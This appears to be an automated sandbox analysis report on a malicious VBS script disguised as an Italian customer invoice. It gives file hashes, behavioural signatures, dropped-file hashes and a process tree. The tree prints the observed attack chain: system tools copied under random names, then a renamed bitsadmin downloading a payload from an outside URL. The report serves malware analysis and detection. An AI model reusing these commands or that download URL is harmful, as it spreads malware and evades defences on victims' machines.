Analysis
-
max time kernel
29s -
max time network
63s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
20-05-2022 14:38
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_00453830309.vbs
Resource
win7-20220414-en
General
-
Target
Fatt_cliente_00453830309.vbs
-
Size
3KB
-
MD5
62b3b8b5c2ceacaee5e3e22939c45a43
-
SHA1
3a579492c1c373cb61ced3c7a88cffb13d73e1ac
-
SHA256
77e7a4deb92496d0954a6fd03cece71dfd53bc774cfb89dc16410c91cf09f598
-
SHA512
0b969e6f0163f22402bfb31f424ff33b8985a1406fd65936e4239b31ba1b75501cbea31bd944cd02c97d88e707e08097b83b8b258e2352b4f92286e09fac93d1
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2044 FeUgzu.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1960 wrote to memory of 2036 1960 WScript.exe 27 PID 1960 wrote to memory of 2036 1960 WScript.exe 27 PID 1960 wrote to memory of 2036 1960 WScript.exe 27 PID 1960 wrote to memory of 1144 1960 WScript.exe 29 PID 1960 wrote to memory of 1144 1960 WScript.exe 29 PID 1960 wrote to memory of 1144 1960 WScript.exe 29 PID 1960 wrote to memory of 2044 1960 WScript.exe 31 PID 1960 wrote to memory of 2044 1960 WScript.exe 31 PID 1960 wrote to memory of 2044 1960 WScript.exe 31 PID 1960 wrote to memory of 2044 1960 WScript.exe 31
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_00453830309.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zFeUgzu.exe2⤵PID:2036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\FeUgzu.exe2⤵PID:1144
-
-
C:\Users\Admin\AppData\Roaming\FeUgzu.exe"C:\Users\Admin\AppData\Roaming\FeUgzu.exe" /transfer DQeUoq /download https://sheyenneweber.com/webol/00453830309/uk.jpg C:\Users\Admin\AppData\Roaming\uk.jpg2⤵
- Executes dropped EXE
PID:2044
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182KB
MD50920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51
-
Filesize
182KB
MD50920b14aa67a8b04acf48ffe7c6f0927
SHA13421124253058dc21453ebac531b67aeb999f627
SHA256838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00
SHA5122b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51